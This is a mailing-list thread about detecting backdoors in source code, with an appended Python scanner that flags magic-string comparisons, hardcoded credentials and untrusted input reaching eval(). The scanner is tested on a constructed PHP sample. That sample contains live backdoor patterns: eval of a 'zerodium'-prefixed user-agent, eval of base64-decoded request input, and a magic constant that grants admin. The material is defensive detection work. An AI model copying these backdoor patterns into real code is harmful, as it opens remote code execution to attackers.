tool to look for backdoors (and logic bombs, time bombs, hardcoded passwords, etc.)


Black, Paul E. (Fed)

Jun 11, 2021, 1:34:32 PM6/11/21
to samate-discuss
Are there tools that look for backdoors in code? A backdoor is, for example, what someone added to PHP (the language!) two months ago: if a header begins with "zerodium", the remainder is accepted as arbitrary code. See
https://arstechnica.com/gadgets/2021/03/hackers-backdoor-php-source-code-after-breaching-internal-git-server/
https://www.zdnet.com/article/official-php-git-server-targeted-in-attempt-to-bury-malware-in-code-base/

Clearly, a full solution is equivalent to the halting problem. But heuristics seem feasible:
* Search for comparisons with hard-coded strings (except as format arguments).
* To deal with basic obfuscation, search for comparisons with large constants, which may be the hash of the magic string.
* Run once on the baseline version, carefully checking all flagged occurrences. Thereafter only check new occurrences.

A similar heuristic search should be able to find some logic bombs (bad behavior in certain conditions) or time bombs (bad behavior on certain dates or times).

A quick web search returned some hits, so I think people are trying to do this.

-paul-
Paul E. Black
paul....@nist.gov
100 Bureau Drive, Stop 8970
Gaithersburg, Maryland 20899-8970
voice: +1 301 975-4794  fax: +1 301 975-6097
http://hissa.nist.gov/~black/

Chris Wysopal

Jun 11, 2021, 2:27:30 PM6/11/21
to Black, Paul E. (Fed), samate-discuss
Hi Paul,

Chris Eng and I wrote a paper on detecting backdoors based on research into known backdoors. We presented it at Black Hat in 2007. Much of our detection relied on backdoor indicators that are hints of backdoors. Obfuscation is one often seen. An example is a string that is base64-decoded and then sent to eval(). Some backdoors look like vulnerabilities. A hidden parameter in a web request is sent to eval(). Another indicator is hardcoded credentials.


A few years later I updated the work with Tyler Shields for an article in the DuD journal. Attached.

Best,
Chris



Attachment: DuD-Static-detection-of-backdoors-wysopal.pdf
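The heuristics Paul proposes (comparisons against hard-coded strings or large constants, scan the baseline once and then only review new hits) and the indicators Chris lists (a decoded blob or a request parameter reaching eval(), hardcoded credentials) are small enough to prototype together. The Python scanner below is an added example written for this page; it is not code from either poster, from the Black Hat paper or from any tool they mention. The indicator names, regexes and the PHP-like sample source are constructed here for illustration, and the sample is not the actual PHP commit. Real code needs a parser rather than line regexes, but the shape of the check is the same.

```python
"""Heuristic backdoor-indicator scanner (added example, not a real tool).

Indicators, taken from the thread:
  * comparison against a hardcoded string literal (a "magic" value)
  * comparison against a large integer constant (a hash may hide the magic string)
  * untrusted input or a decoded blob reaching eval()
  * a password/secret-like name assigned a literal
Baseline mode: findings already present in a reviewed baseline are suppressed,
so only new occurrences need attention.
"""
import hashlib
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    indicator: str
    lineno: int
    text: str

    def fingerprint(self) -> str:
        # Location-independent: moving or re-indenting a line does not make it "new".
        norm = " ".join(self.text.split())
        return hashlib.sha256(f"{self.indicator}|{norm}".encode()).hexdigest()


CMP = r"(?:===|!==|==|!=)"
STR = r"""(?:"[^"\n]{4,}"|'[^'\n]{4,}')"""  # string literal of at least 4 chars
CMP_FUNCS = r"(?:strcmp|strncmp|strcasecmp|memcmp|strstr|strpos|str_starts_with)"
INDICATORS = [
    ("magic-string-compare", re.compile(
        rf"{CMP}\s*{STR}|{STR}\s*{CMP}|\b{CMP_FUNCS}\s*\([^)\n]*{STR}")),
    ("large-constant-compare", re.compile(
        rf"{CMP}\s*(?:0x[0-9A-Fa-f]{{6,}}|\d{{7,}})\b|\b(?:0x[0-9A-Fa-f]{{6,}}|\d{{7,}})\s*{CMP}")),
    ("hardcoded-credential", re.compile(
        r"""(?i)\b\w*(?:passw(?:or)?d|pwd|secret|api_?key|token)\w*\s*(?:=>|=|:)\s*["'][^"'\n]{3,}["']""")),
]
# Taint sources for the eval() indicator: request superglobals and decoders (hypothetical list).
SOURCES = re.compile(
    r"\$_(?:GET|POST|REQUEST|COOKIE|SERVER)\b|\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin)\s*\(")
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=(?!=)\s*(.+)$")
EVAL = re.compile(r"\beval\s*\((.*)\)")
VAR = re.compile(r"\$(\w+)")


def _tainted(expr: str, tainted: set) -> bool:
    return bool(SOURCES.search(expr)) or any(v in tainted for v in VAR.findall(expr))


def scan(src: str) -> list:
    """Return findings for one PHP-like source file, in line order."""
    findings, tainted = [], set()
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, rx in INDICATORS:
            if rx.search(line):
                findings.append(Finding(name, lineno, line.strip()))
        # Single-pass, per-file taint tracking: $v = <source or tainted var>; ... eval($v)
        m = ASSIGN.match(line)
        if m and _tainted(m.group(2), tainted):
            tainted.add(m.group(1))
        m = EVAL.search(line)
        if m and _tainted(m.group(1), tainted):
            findings.append(Finding("untrusted-input-to-eval", lineno, line.strip()))
    return findings


def new_findings(baseline_src: str, current_src: str) -> list:
    """Findings in current_src whose fingerprint is absent from the reviewed baseline."""
    known = {f.fingerprint() for f in scan(baseline_src)}
    return [f for f in scan(current_src) if f.fingerprint() not in known]


# Constructed sample input (not the real PHP commit): a reviewed baseline and a
# later revision carrying the shapes of backdoor described in the thread.
BASELINE_SRC = """<?php
function handle($headers) {
    if ($headers["X-Api-Version"] == "v2.1-stable") { return legacy(); }
    $out = sprintf("%s", $headers["User-Agent"]);
    return $out;
}
"""
CURRENT_SRC = """<?php
function handle($headers) {
    if ($headers["X-Api-Version"] == "v2.1-stable") { return legacy(); }
    $ua = $_SERVER["HTTP_USER_AGENT"];
    if (strncmp($ua, "zerodium", 8) == 0) { eval(substr($ua, 8)); }
    if (crc32($headers["X-Token"]) === 0x9f3a7c21) { grant_admin(); }
    $p = base64_decode($_GET["c"]);
    eval($p);
    $db_password = "hunter2";
    $out = sprintf("%s", $headers["User-Agent"]);
    return $out;
}
"""

if __name__ == "__main__":
    for f in new_findings(BASELINE_SRC, CURRENT_SRC):
        print(f"{f.lineno:>3}  {f.indicator:<24} {f.text}")
```

Running it reports five new findings and stays silent on the benign version-string comparison that was already reviewed in the baseline, which is the "check new occurrences only" workflow. The fingerprint hashes the indicator plus the whitespace-normalized line rather than the line number, so moving code around does not re-surface old hits; the cost is that a reviewer must re-check a hit whenever the line itself changes, which is the conservative direction.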